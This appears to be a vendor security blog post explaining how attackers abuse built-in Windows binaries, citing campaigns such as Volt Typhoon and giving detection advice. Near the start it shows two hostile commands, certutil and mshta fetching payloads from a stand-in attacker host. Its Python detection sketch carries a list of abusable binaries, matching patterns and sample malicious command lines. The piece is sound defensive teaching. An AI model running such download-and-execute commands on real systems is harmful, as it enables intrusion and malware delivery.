A security team investigates a breach. They scan for malware. Nothing. They check for unauthorized software. Clean. Every process that ran during the attack was a legitimate, Microsoft-signed binary that ships with Windows.
That's Living off the Land in action. No malware needed. The operating system itself becomes the weapon.
What Are LOLBins?
LOLBins, short for Living off the Land Binaries, are legitimate system tools that attackers repurpose for malicious activity. They're pre-installed, digitally signed, and trusted by most security solutions. That's exactly what makes them dangerous.
Why upload a custom tool that might trigger antivirus when certutil.exe can download your payload just fine? Why write a dropper when mshta.exe can execute remote scripts natively?
The LOLBAS project currently documents over 200 Windows binaries, scripts, and libraries that can be abused this way. MITRE ATT&CK tracks these techniques under multiple categories, most notably T1218 (System Binary Proxy Execution).
The Most Abused LOLBins
certutil.exe - Built for certificate management. Attackers use it to download files and encode payloads. It bypasses most web filters because it's not a browser.
```cmd
certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\payload.exe
```
mshta.exe - Runs HTML Applications. One command executes remote scripts without anything touching the disk. Used by APT32 and FIN7.
```cmd
mshta http://attacker.com/malicious.hta
```
regsvr32.exe - Registers COM objects. The "Squiblydoo" technique uses it to execute remote scriptlets, bypassing AppLocker without admin privileges.
rundll32.exe - Loads DLL files. Attackers abuse it to proxy execution through trusted binaries or run JavaScript directly.
PowerShell - Not a traditional LOLBin, but the most powerful living-off-the-land tool available. Deep Windows API integration lets it download payloads, execute code in memory, harvest credentials, and move laterally.
| Binary | Legitimate Purpose | Attacker Use |
|---|---|---|
| bitsadmin.exe | Background file transfers | Stealthy payload downloads |
| wmic.exe | System management | Remote code execution |
| msiexec.exe | Installer packages | Execute remote MSI payloads |
| forfiles.exe | Batch file processing | Command execution bypass |
Why Traditional Security Misses Them
Most security tools rely on signature detection and reputation scoring. LOLBins break both.
Signatures look for known malicious files. LOLBins are legitimate. Reputation scoring flags unknown executables. LOLBins have the highest possible reputation. Application whitelisting (AppLocker, WDAC) can block unauthorized software, but you can't block certutil.exe or powershell.exe without breaking legitimate workflows.
Your security stack watches the front door while attackers walk through the house using keys that were already on the table.
Real-World Campaigns
Volt Typhoon (2023-2024) - This Chinese state-sponsored group compromised US critical infrastructure using almost exclusively LOLBins. netsh, certutil, wmic, PowerShell. No custom malware. CISA issued a specific advisory because their living-off-the-land approach made them nearly invisible.
APT29 / Cozy Bear - The SolarWinds attackers used rundll32.exe to load their SUNBURST backdoor and relied on built-in Windows tools for post-exploitation.
Raspberry Robin (2022-2024) - This worm spreads via USB drives and uses msiexec.exe to fetch payloads. It chains multiple LOLBins together, making each step look benign while the attack progresses.
How to Detect and Defend
You can't block these tools. You can watch them closely.
- Enable command-line logging. Windows Event ID 4688 and PowerShell Script Block Logging (4104) are non-negotiable. The binary is legitimate, but the arguments tell the story.
- Monitor process relationships. `certutil.exe` launched by a certificate tool is expected. `certutil.exe` spawned by `outlook.exe` after opening an attachment is a red flag.
- Build SIEM rules for abuse patterns. Flag `certutil` with `-urlcache`, `mshta` accessing external URLs, `regsvr32` loading remote scriptlets, and any LOLBin spawned from Office applications.
- Deploy ASR rules. Microsoft's Attack Surface Reduction rules specifically target LOLBin abuse paths: blocking Office apps from creating child processes, blocking script execution from downloaded content.
- Audit continuously. Gaps in logging, missing EDR coverage, and overly permissive execution policies all create space for LOLBin abuse. SecValley's CSPM platform continuously assesses your Microsoft environment's security posture, surfacing the configuration gaps that make living-off-the-land techniques possible.
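The command-line and parent-process checks from the list above, as an added example that is not part of the original article and not SecValley's tooling: it runs the rules over a handful of constructed records shaped like the fields of Security Event ID 4688 (NewProcessName, ParentProcessName, CommandLine). The field names, the sample paths and the `example.invalid` URLs are assumptions, chosen to mirror the patterns the list describes.

```python
"""Detection sketch for LOLBin abuse over process-creation events.

Added example, not from the original article. Input records are constructed
to resemble Event ID 4688 fields; the field names are an assumption.
"""
import re

# Binaries the article names as commonly abused (lower-case basenames).
LOLBINS = {
    "certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "powershell.exe", "bitsadmin.exe", "wmic.exe", "msiexec.exe", "forfiles.exe",
}
# Office parents whose child LOLBin launches are a red flag.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Any http/https/ftp URL on the command line of a binary that should not need one.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(event: dict) -> list[str]:
    """Return the names of every abuse pattern that matches one event."""
    proc = basename(event["NewProcessName"])
    parent = basename(event["ParentProcessName"])
    cmd = event["CommandLine"]
    cmd_l = cmd.lower()
    findings = []
    # certutil used as a downloader: the binary is fine, the argument is the tell.
    if proc == "certutil.exe" and "-urlcache" in cmd_l:
        findings.append("certutil_urlcache_download")
    # mshta pointed at a remote URL rather than a local .hta file.
    if proc == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta_remote_url")
    # regsvr32 referencing a remote location instead of a local DLL.
    if proc == "regsvr32.exe" and URL_RE.search(cmd):
        findings.append("regsvr32_remote_scriptlet")
    # Any LOLBin whose parent is an Office application.
    if proc in LOLBINS and parent in OFFICE_PARENTS:
        findings.append(f"lolbin_from_office:{parent}")
    return findings


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (record_index, findings) for every event that matched a rule."""
    hits = []
    for i, ev in enumerate(events):
        found = flag_event(ev)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample events (not real telemetry). Records 0 and 3 are benign
# uses of the same binaries and should produce no finding.
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\setup.msi SHA256"},
    {"NewProcessName": r"C:\Windows\System32\certutil.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/x.exe C:\temp\x.exe"},
    {"NewProcessName": r"C:\Windows\System32\mshta.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/page.hta"},
    {"NewProcessName": r"C:\Windows\System32\regsvr32.exe",
     "ParentProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1"},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(f"record {index}: {', '.join(findings)}")
```

Two of the five constructed records are benign uses of `certutil.exe` and `regsvr32.exe` and produce nothing, which is the point of matching on arguments and parent rather than on the binary name alone. In production the same logic belongs in the SIEM over forwarded 4688 or Sysmon process-creation events, and the `-urlcache` rule in particular still needs parent-process context before it becomes an alert, because administrators do use it legitimately.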
The Bottom Line
Attackers don't need to bring their own tools when yours work just fine. LOLBins turn trusted system utilities into attack infrastructure. No signatures to detect. No reputation flags to trigger. Just normal-looking processes doing abnormal things.
Your operating system is already full of weapons. The question is whether you're watching who picks them up.